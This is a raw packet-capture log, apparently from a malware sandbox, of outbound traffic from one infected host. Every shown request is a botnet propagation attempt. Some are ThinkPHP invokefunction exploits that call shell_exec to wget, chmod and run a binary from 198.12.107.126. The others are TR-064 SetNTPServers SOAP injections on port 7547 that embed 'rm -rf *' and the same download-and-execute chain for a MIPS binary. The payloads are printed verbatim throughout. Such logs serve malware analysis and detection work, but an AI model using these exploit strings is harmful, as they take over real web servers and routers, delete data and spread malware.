                                          Nov 7, 2024 11:58:01.583061934 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          40192.168.2.1337748112.243.149.21780
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.591562033 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          41192.168.2.1341184112.114.206.12180
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.598309040 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          42192.168.2.1357310112.241.239.17880
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.659944057 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          43192.168.2.1337274182.58.1.2427547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.667975903 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          44192.168.2.1338948219.44.145.47547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.667977095 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          45192.168.2.1352622110.211.19.1207547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.695116043 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          46192.168.2.1360912112.73.190.13580
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.779483080 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          47192.168.2.1349376112.159.194.4180
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.794023037 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          48192.168.2.1337486112.181.239.7480
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.798989058 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          49192.168.2.134990893.165.93.727547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.818545103 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          50192.168.2.135546646.229.152.1997547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.818552971 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          51192.168.2.133778490.201.142.1227547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.823489904 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          52192.168.2.1350936112.192.42.8980
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.432128906 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          53192.168.2.1345908112.106.192.8680
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.433640003 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          54192.168.2.1333358112.255.117.380
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.434983969 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          55192.168.2.1333426112.170.138.21880
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.436335087 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          56192.168.2.1346576112.114.211.9980
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.438749075 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          57192.168.2.1346756112.79.142.14980
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.439855099 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          58192.168.2.1345320112.69.147.11280
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.442529917 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          59192.168.2.1333730112.146.81.18980
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.443953991 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          60192.168.2.1349966112.10.98.12780
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.445863008 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          61192.168.2.1345594112.57.86.21780
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.447020054 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          62192.168.2.1347320112.178.200.17480
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.494674921 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          63192.168.2.1356798112.22.69.21780
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.526439905 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          64192.168.2.1352750112.38.234.23280
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.528918982 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          65192.168.2.1356016112.58.59.24780
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.562750101 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          66192.168.2.1343544112.15.53.4580
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.564629078 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          67192.168.2.1356370112.112.214.18680
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.566777945 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          68192.168.2.1339344199.58.155.757547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.688154936 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          69192.168.2.134021461.64.58.1617547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.724416971 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          70192.168.2.134041097.18.162.2007547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.728456020 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          71192.168.2.135191675.183.209.417547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.755669117 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          72192.168.2.135235075.183.209.417547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.761583090 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          73192.168.2.1342262183.59.129.1507547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.786724091 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          74192.168.2.1350976157.4.219.1147547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.788430929 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          75192.168.2.1342650183.59.129.1507547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.792579889 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
